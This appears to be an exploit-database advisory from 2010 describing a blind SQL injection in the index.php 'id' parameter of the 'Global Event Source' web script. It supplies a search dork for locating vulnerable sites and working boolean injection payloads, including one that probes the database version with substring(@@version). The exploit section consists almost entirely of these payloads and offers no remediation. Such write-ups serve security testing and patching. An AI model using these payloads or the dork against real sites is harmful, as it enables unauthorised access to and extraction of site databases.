id: 13963
date: 09/03/2010
title: Global Event Source (index.php) Blind Sql Injection Vulnerability
author: AtT4CKxT3rR0r1ST
cves: 

=================================================================
Global Event Source (index.php) Blind Sql Injection Vulnerability
=================================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Script : Global Event Source
.:. Bug Type : Blind Sql Injection
.:. Dork : "Powered by: Global Event Source"

####################################################################

===[ Exploit ]===

www.site.com/index.php?p=Event&id=184[Blind Injection]


www.site.com/index.php?p=Event&id=184+and+1=1 >>> True
www.site.com/index.php?p=Event&id=184+and+1=2 >>> False

www.site.com/index.php?p=Event&id=184+and+substring(@@version,1,1)=5 >>> True
www.site.com/index.php?p=Event&id=184+and+substring(@@version,1,1)=4 >>> False

####################################################################



#  0day.today [2023-03-27]  #